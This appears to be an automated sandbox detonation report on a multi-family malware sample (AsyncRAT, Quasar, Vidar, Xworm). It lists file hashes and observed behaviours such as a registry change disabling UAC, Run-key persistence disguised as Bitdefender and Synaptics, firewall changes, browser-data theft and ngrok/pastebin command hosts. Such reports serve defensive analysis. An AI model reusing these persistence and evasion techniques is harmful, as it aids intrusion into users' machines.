| SHA512 | ae4152e5c9b5b06d1061a11a568218f8e48009a7363f2b6816c2693164c59f509a7827a22603e9cc8f2026ac97700cea5fe3caba4ff0f92d7a60d7a121f46b5e |
memory/3112-3551-0x0000000000900000-0x0000000000C24000-memory.dmp
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
| MD5 | 5da0a355dcd44b29fdd27a5eba904d8d |
| SHA1 | 1099e489937a644376653ab4b5921da9527f50a9 |
| SHA256 | e7fa9494811b479f00405027a8bad59dccaa410ac439bdd046ed2c440d0e101f |
| SHA512 | 289ac0076045bcb1e8b35d572ed27eca424f718b9ef26d821a5cc7ee372203125a6c516b296044efc23ad4d4bd771e1d875cf74107b9205c5312a6c49d37b0a6 |
memory/5084-3562-0x0000000000810000-0x0000000000B34000-memory.dmp
memory/4956-3612-0x00000000008A0000-0x0000000000BC4000-memory.dmp
C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe
| MD5 | d4a776ea55e24d3124a6e0759fb0ac44 |
| SHA1 | f5932d234baccc992ca910ff12044e8965229852 |
| SHA256 | 7ef4d0236c81894178a6cfc6c27920217bea42a3602ad7a6002834718ba7b93c |
| SHA512 | ba9127f7f84e55a37e4eb1dc1a50d10ef044f0b24a23d451187c8d1dedec26d3a37cf78e8763b351ef1e492e26b1ef9b28fc2331591ce1b53c3d76369d100f4b |
memory/4644-3616-0x00000000008E0000-0x0000000000C04000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\S0Ahb7wqiLdU.bat
| MD5 | 9f90cd2f71eb081ca49723618b590f48 |
| SHA1 | f5979dd693e29674534363991a5c81ee72a360a4 |
| SHA256 | ee42c816740cd2041c7fe0468f7428fd867c1fc52385c1fa6678e4344c295fc0 |
| SHA512 | e888bbabb997c7c1a7a9a129b52e945721a4b21a90fd2ff9213518d556a46c8086e4489d333fd39a4db2e900444c65bb4e86e47f5b6f4d11036ac2b29654a4c3 |
C:\Users\Admin\AppData\Local\Temp\hEb9H3hRUfd2.bat
| MD5 | 173ecaead14c1fb024d5ad0931a16c12 |
| SHA1 | 0ba26e25c07445743eb3007465d2f6ad3dffc277 |
| SHA256 | 422b69910e2f28aef577e7692d0c37a95483275b5231bbae845404c1e787eb9e |
| SHA512 | 6c4988dfbc3ab9477b1be1d3362ba79b0a141f7e7a19c967b86e8c95f9ecd65775f30ef78892cec4bd660ae850fc65749aaabd4a126ed71019b601214e7834af |
memory/888-3677-0x0000000000130000-0x0000000000150000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1gDcq6KwkC4i.bat
| MD5 | 8d1a743f270c76527479866fa8fdf02f |
| SHA1 | db51256fd48ea3021753219dc116f8ec89cbda86 |
| SHA256 | 11df1786f3d18fcb202d46f3ad8ad47e765692dc49dee4efe11b62b6f8c9310c |
| SHA512 | dd7635ddbe2c365e8c2cc0fb4486d270fa5892f6d6ff455c9f7d920ec221cb66f0f4ea88e19c85ee34ce2d5310c6c4ca4a649fdf14b41a30f92f56d81f14ae9f |
memory/2320-3729-0x0000000000AE0000-0x0000000000E04000-memory.dmp
memory/3440-3763-0x0000000000F60000-0x0000000000F9E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\j6z7JyGJ60PR.bat
| MD5 | a55c1246884622d2d569fc00a60e3e19 |
| SHA1 | 97107e929bbe8601229093e5bbff64dac1123b07 |
| SHA256 | 778c5bd282e7813255e67d8788f485086a451b8157f982f16a978c51bf93b190 |
| SHA512 | 15667d4f0807e0a4f1a52bc5422fedc7184075437cf7b1aeaba8f0174838fa4cb0d1c1dc701c1849f9662363a89640cc5d1ac75d85763230e196c0671de0de01 |
C:\Users\Admin\AppData\Local\Temp\4ZAVHlJm6aW9.bat
| MD5 | bf3b4a3303d4e4271526b7f22f733671 |
| SHA1 | 99ef51352cbd51e9823c19f4c4ecacf9646c74a9 |
| SHA256 | f11f3c82c646b1cfa86729a7e0d5998d5e0c860da226f475f84dd188d8dffd9d |
| SHA512 | 930c928874bef20a0275d34918b03c49ae3bd2f2d1ce20ef60778798b2785d5d634ce01b9d054ed32e4dbae7e9769b17469d67b33ddc8ab4e2382b5d6e91c256 |
memory/4396-3794-0x0000000000990000-0x00000000009A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\QZQBLEqosfSN.bat
| MD5 | 0e4d3ee1393415299bffefbf16449903 |
| SHA1 | 26f7be2f645c6ef728a975a07a2e9d119979af38 |
| SHA256 | fef1fb06c66f5c08ae32ed88638c0554db6b35b5c992b21b3748f464845879ce |
| SHA512 | 389c6ff94d4496014cad80ed91f80e647ebd22fb2b690900bf5c7a19b0050a6d110bb616aea602d526713eb89957ea84f52c5ab1a2bb12b54ddcac6e0378b7ae |
memory/3160-3808-0x00000000009F0000-0x0000000000A76000-memory.dmp
C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe
| MD5 | 4e7b96fe3160ff171e8e334c66c3205c |
| SHA1 | ad9dbdfb52d3c2ee9a57fe837605ec233db43a7f |
| SHA256 | e698a786c4dcd964e54903a98bfaa0638ce8f52e02658f1223805c6e3b1ca83c |
| SHA512 | 2e8968ce87a1670ff6b49f92beaee8c7d1b2fd94bc216507e255bb2a54d4073fbbd20b39e188fd40eb049da59bf27f9aed729c390525232e4a904e71e10f9b48 |
memory/1096-3853-0x0000000001390000-0x0000000001416000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\mgfpRTWIUj34.bat
| MD5 | 92d0437f9ef305acfb2e37cf61ab4299 |
| SHA1 | 961cb6a196f31cb251b41c48c59e5b9ac8ac4940 |
| SHA256 | f2933fdc2daebf7b66b1aa76e083a7adb849dc87c2fcd765badd8da39d0c364a |
| SHA512 | a6ad8adb5ed7ddb91e6209c7cefb5733dd97aae1b77dac05401c90b003669b7e798bddd8cd0a84a236965807a6c4da7137e68fe6e1f46111750003188fe5c284 |
memory/484-3867-0x0000000001170000-0x0000000001494000-memory.dmp
memory/1244-3868-0x0000000001120000-0x0000000001444000-memory.dmp
C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe
| MD5 | ff8c68c60f122eb7f8473106d4bcf26c |
| SHA1 | 0efa03e7412e7e15868c93604372d2b2e6b80662 |
| SHA256 | 5ff2becf2c56500cb71898f661c863e647a96af33db38d84d7921dc7dbf4f642 |
| SHA512 | ab92ef844a015c3fcbfba313872b922bff54184b25623ed34f4829bd66a95af081cdeefd35425a4d3b9d9085ccf8c25045cf6093d74a5c8c35012c1b7546688e |
memory/3752-3874-0x0000000000370000-0x0000000000694000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ppDiKTAIxf8s.bat
| MD5 | cc0d7311ca2149f60e102772e1cdf151 |
| SHA1 | 6fa746c971c5533982a04aa10b23d9a4450d7224 |
| SHA256 | 70adf156f70b573664323edc9d5c4a14c925c33685842d78a5a962dc08d8ca93 |
| SHA512 | 1c83bd1edf56f3f01c96bb9559bfaaf476fc630407b00d3a91c0aa6f4ba6c095c040faac0c07c2e1dc2272dea436e84484fb042a9e45bd86b4eb0e800feb9538 |
C:\Users\Admin\AppData\Local\Temp\q55bgR7thNVT.bat
| MD5 | de135cfab7f87be50527bc285b7e66ec |
| SHA1 | 99e2629402f10f6dbe960b14fc823e831774e72a |
| SHA256 | d3e3cb66142ffa4dc11703fec9d15bb64c1d6aeca6cd6232470c5daa27acd230 |
| SHA512 | 23d86cf0bbc4b0fa2e5648f83fdaff7be0ca5a0b92cabe41aad1dc560bb223ece725fd8d9a3ab469ac20aebe3e0c398ebc9e6b94e3e9597e5947205344fd5606 |
C:\Users\Admin\AppData\Local\Temp\X5hI9T69oF0z.bat
| MD5 | e47d6cfe6efa4613c51c12e6a70e1b9d |
| SHA1 | efde6d054092a6316e8ce83de227f574b1a5e027 |
| SHA256 | c0a06c0c32457e2ffa7499a3fa6f769f765ab5c72db8a8b806ddee412806e356 |
| SHA512 | c3769fec0b94c8dc04e648e0a4825cff8d63df1d0a5eedf1af55e23f736485ed8f13fe2dce3d9e4294ab147c5c3106f1bd6fbdb8def04037b7dc82b52a8de888 |
C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe
| MD5 | 991e707e324731f86a43900e34070808 |
| SHA1 | 5b5afd8cecb865de3341510f38d217f47490eead |
| SHA256 | 32d8c2a1bb4d5a515d9eb36c1286b0ac08624c8ea3df0e97f12391558ce81153 |
| SHA512 | 07411dffbc6beff08a901afa8db3af4bc7d214407f7b20a8570e16b3900f512ad8ee2d04e31bb9d870585b9825e9102078f6c40eb6df292f09fffe57eea37f79 |
memory/3780-3953-0x0000000000240000-0x000000000024E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe
| MD5 | 0076324b407d0783137badc7600327a1 |
| SHA1 | 29e6cb1f18a43b8e293539d50272898a8befa341 |
| SHA256 | 55c727a9806966ec83f22702c1101c855a004c5658cf60e3c3499f895b994583 |
| SHA512 | 96b08dd1a7abccefabe3568637c17f6ae2c04349488db8dc05b9dcaaaef6a041c36fa4a1f1841096d6622b9775099c7c7eb1497c57581cb444afeb481563cae4 |
memory/2664-3969-0x0000000000800000-0x0000000000812000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\uTBZJw95QmYA.bat
| MD5 | d16ea7346ed37c055a4a03311b659f56 |
| SHA1 | fe6db9db72b7e04f0de9db2dc2ffdefcad8df826 |
| SHA256 | ebdd57723f85a59ac828e58d5f4ca4206c3fa014afd435465b2f988b892bb8d5 |
| SHA512 | 480002fba1f1f429380b2a7c81f26a1226e46a492af103f7af12a2a8c7495f879be27a6bd850e9799e221e19be82bb2b8a84d2388e8d2c372b71d93c9dc90d77 |
memory/948-4015-0x0000000000FE0000-0x0000000001304000-memory.dmp
memory/4340-4028-0x00000000013B0000-0x00000000016D4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\W0OTT0ZRdELW.bat
| MD5 | fe752131e279b994b7207b3f5d4a3767 |
| SHA1 | 1653cfe79b68844de3bbc7812b2a42f61b42f5d9 |
| SHA256 | 2451595911d8e9aef23573afe78cc2fb78acea35420d7f36b8aea9a12a78a03d |
| SHA512 | f24fe7a679b9f14b7d4e6684e13ec2a80c5406f8471261dffef2a373756ddc33e9a3a7f377993f0683916a713f638a75cf3d064b54643b226c439bb37176f1d2 |
C:\Users\Admin\AppData\Local\Temp\QCGANXGlRZof.bat
| MD5 | 5629f59329611f37428fa42124d79d80 |
| SHA1 | 16776c1fcf26abcba43d81dfb5c10953fb4429ce |
| SHA256 | 16ed3860e2ab444cd9ad1b687650e99c570ab836a405fb3517cd5c0016a17c93 |
| SHA512 | 106c512573c3b5e93e091812f94afadf7a1d92a2f22505a1e2f273b92a4309f6ab94e5e792a99dec8ec0e728d2a4220dc4f974effd5723e320d74f5219f6b7a7 |
C:\Users\Admin\AppData\Local\Temp\3wSQiyOdnYt3.bat
| MD5 | 9ac77a50aafb7fbf78bfbc0f978be6c9 |
| SHA1 | ba0f1146d9727bb299eac05eb51474df81594ce6 |
| SHA256 | f0ed61ae18a9a4af3898eda4272bd5f21b04ce9d3771284061ff927d9b5427c0 |
| SHA512 | 061ebea055dfb993b90a35b5f8fcaa9ed8ff2656188181ebbd5741bb673989388ee3c554caa2749fad513ccd68a6d5aa5f5f4999e2129d6f7127df2577bede96 |
Analysis: behavioral2
Detonation Overview
Submitted
2025-01-26 00:01
Reported
2025-01-26 00:04
Platform
win10v2004-20241007-en
Max time kernel
15s
Max time network
151s
Command Line
Signatures
AsyncRat
Asyncrat family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Vidar
Vidar family
Xred
Xred family
Xworm
Xworm family
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\TransferRare | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| File opened for modification | C:\Windows\EscortsNascar | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| File opened for modification | C:\Windows\NavyPromising | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| File opened for modification | C:\Windows\HonoluluSyndrome | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| File opened for modification | C:\Windows\OxfordPrintable | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| File opened for modification | C:\Windows\ViBases | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| File opened for modification | C:\Windows\ImmediatelyBros | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\36.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Update.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\T.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\windows.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\test.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
